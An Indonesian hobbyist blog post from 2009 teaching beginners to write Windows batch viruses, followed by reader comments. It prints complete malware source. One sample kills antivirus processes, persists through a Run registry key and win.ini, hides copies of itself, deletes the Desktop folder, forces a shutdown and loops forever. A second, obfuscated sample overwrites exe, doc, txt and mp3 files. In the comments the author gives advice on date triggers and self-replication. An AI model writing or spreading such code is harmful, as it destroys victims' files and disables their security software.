MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Pemrograman Virus Batch untuk Pemula

Posted by Morphic pada Mei 8, 2009


virus_skullKali ini saya akan ajarkan sdikit bagaimana cara membuat virus batch. Dulu virus ini ngetren sekali (kira-kira tahun 90-an lah). Tapi sekarang ini saya jarang nemuin virus ini berkeliaran…

Virus batch dibuat di notepad dan disimpan dengan ekstensi ”.bat”. Ternyata selain virus VBS masih ada juga virus yang dibuat pake notepad. Yah salah satunya virus BAT (virus Batch).

Kalo kmu hidupkan file notepad kosong dengan ekstensi ”.bat”, yang muncul malah ”bla bla bla is not valid 32 application”
Itu artinya kita harus masukkan code virus ke dalam tubuh file bat itu.. he he he he….
Kali ini akan saya ajarkan kalian… tapi ingat saya tidak bertanggung jawab atas kecerobohan kalian…

Pertama sekali ketik:
@echo off

Yang itu memang mesti ditulis, supaya file tidak memunculkan seluruh command. Dan ini wajib (dianjurkan bozzz). Gak diketik begitu juga gak apa-apa sih sebenarnya…

Baru setelah itu kita ketik code-code virus lainnya… he he he

Ini contoh-contoh code-nya…

Untuk meng-kill process yang aktif:
Tskill AVGUARD

Perhatikan: untuk meng-kill process ketik ”tskill” lalu nama process-nya tapi tanpa ekstensi…
Contoh lain:
Tskill KAV

Untuk menghapus file:
del C:\Progra~1\Accessories\Calc.EXE

Untuk menulis ke regedit:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Morphix /t REG_SZ /d %systemroot%\Morphix.bat /f

Untuk menampilkan messagebox
Msg * “Tulis pesanmu disini”

Dan masih banyak lagi contoh-contohnya….
Langsung aja neh salah satu virus batch yang saya tulis:
::written by Morphic
@ECHO OFF
copy %0 %systemroot%\Morphix.bat > nul
copy %0 *.bat > nul
Attrib +h *.bat
cls
tskill AVGUARD
tskill AVGNT
tskill NMAIN
tskill KAV
tskill ad-aware
tskill av*
tskill PCMAV
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Mophix /t REG_SZ /d %systemroot%\Morphix.bat /f > nul
cls
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\Morphix.bat >> %systemroot%\win.ini
echo run=%systemroot%\Morphix.bat >> %systemroot%\win.ini
Attrib +h %systemroot%\win.ini
del C:\docume~\owner\Desktop
shutdown -s -t 15
msg * ”Karena sesuatu hal komputer ini harus di-shutdown… Ha ha ha”
cls
:Morphix
start %0
goto Morphix
::*Hanya untuk pembelajaran*

mau liat source batch yang lainnya???
Nih virus batch Rawut

@echo off
rem c0d3d by Vires @ tegal city
rem If u wanna know how this worx
rem don’t follow the code from top to bottom
rem but follow the flow of code
rem is it beautiful???yes it is!!!!
rem vires18[at]yahoo[dot]com
rem (c)2007,Indonesia
rem Dedicated to my Girl:S.S.Latifah(did u knew her b 4???)
rem Greetz to all my friends
rem cyrus,bdhamas,sat_anichell,einstein2,wau^wau,the_g irl
rem xniffer,kang hartono miyabi ,the_simpson,psycopath & all i forget
rem sorry!!!!!
goto v781i21r1212e23s4c5o677o85l
:n56a19m75a0101011
%res%%c00l% %gal%* %gal%bat
%l% pulangtegal
:t45e18g14a11l
%zhe% x=exe
%zhe% c=com
%zhe% fah=py
%l% v25i85r19e0s
:l08a80t19i85f08a19h
%zhe% sya=att
%zhe% gal=*.
%zhe% vi=fo
%sya%%res%%ah% %gal%* %s%
%zhe% ti=co
%l% t45e18g14a11l
:v25i85r19e0s
%zhe% d=txt
%zhe% la=do
%zhe% m=doc
%vi%%res% %%r %te% (%gal%%x% %gal%%c% %gal%%d% %gal%%m% %gal%%lgu%) %la% %ti%%fah% %0 “%%r”
%l% n56a19m75a0101011
:v18i17r16e15s
%zhe% s=-%vi%s -%vi%r -%vi%h
%zhe% res=r
%zhe% c00l=en
%l% l08a80t19i85f08a19h
:v781i21r1212e23s4c5o677o85l
set zhe=set
%zhe% te=in
%zhe% l=goto
%zhe% ah=ib
%zhe% lgu=mp3
%l% v18i17r16e15s
ulangtegal
rem Heh,BATCH STILL BEAUTIFUL RIGHT????
rem (c)vires

7 Tanggapan to “Pemrograman Virus Batch untuk Pemula”

  1. Kholis Virologist said

    weleh weleh

  2. iwan said

    gimana cara masukin date /tanggal sehingga virus aktif sesuai dengan tanggal yg kita inginkan…trims..

    • Morphic said

      kalo pemikiran sederhananya bisa pake fungsi “if”

      if date(now) = xxxxx then
      lakukan
      end if

      usahakan format tanggalnya “tanggal bulan tahun”
      contoh:
      4 June 2009

      usahakan bulan-nya dlm bhasa inggris…

      tapi kalo didalam batch hal ini sulit dilakukan…

  3. decki said

    wowww tu virus jadul yah????
    pic bisakah di jelaskan sidikit tentang virus ini th banyak tulisan aneh,,,jadi nih virus nyerang apa aja??? btw kalo code penggandaan dirinya gmn????biar bisa nyeber2…^^

    • Morphic said

      kalo batch mengganda biasanya pake tanda “>” atau “>>”
      gitu…
      maksudnya nambah teks ke file lain / file yang dituju…

      sebetulnya kalo dipahami tulisan-tulisan aneh ini gampang dimengerti kok…

      tunggu aja artikel berikutnya ya… (artikel yang membahas batch juga)

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: